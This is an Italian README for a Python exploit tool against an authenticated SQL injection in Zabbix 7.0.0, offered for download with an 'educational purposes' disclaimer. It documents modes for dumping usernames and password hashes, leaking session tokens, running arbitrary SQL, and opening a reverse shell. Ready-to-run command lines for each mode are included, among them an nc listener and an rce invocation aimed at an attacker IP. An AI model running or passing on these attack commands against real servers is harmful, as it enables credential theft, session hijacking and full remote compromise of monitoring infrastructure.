
Questo è solo a scopo educativo. Per favore, non utilizzarlo contro sistemi non autorizzati.
Uno script Python per sfruttare una vulnerabilità di iniezione SQL autenticata su Zabbix 7.0.0, che supporta molteplici modalità di azione, tra cui estrazione di dati utente, perdita di token di sessione, esecuzione remota di comandi (RCE) e iniezione di query personalizzate.
⚠️ DISCLAIMER:
Questo script è destinato esclusivamente a scopi educativi e test di penetrazione autorizzati.
Non utilizzarlo su sistemi di cui non sei proprietario o per i quali non hai esplicita autorizzazione.
L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.
requestsInstalla i requisiti se necessario:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODALITÀ> [argomenti opzionali...]
| Modalità | Descrizione | Richiede Token Admin |
|---|---|---|
| leak-users | Estrae tutti gli ID utente, nomi utente, hash delle password e ruoli | ❌ |
| leak-tokens | Estrae tutti gli ID di sessione attivi dal database | ❌ |
| rce | Avvia una reverse shell tramite exploit item.create | ✅ |
| custom | Esegue qualsiasi query SQL personalizzata tramite l'iniezione | ❌ |
Estrai Hash Utente
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
Perdita Token di Sessione
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
Esecuzione Remota di Comandi (Reverse Shell)
# Avvia prima un listener:
nc -lvnp 9001
# Poi esegui:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
Iniezione SQL Personalizzata
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Script di exploit principale
README.md # Questa documentazione
Anthony (@874anthony)
Realizzato con amore e curiosità 🐍
Questo progetto è rilasciato sotto la licenza MIT. Si prega di usarlo responsabilmente.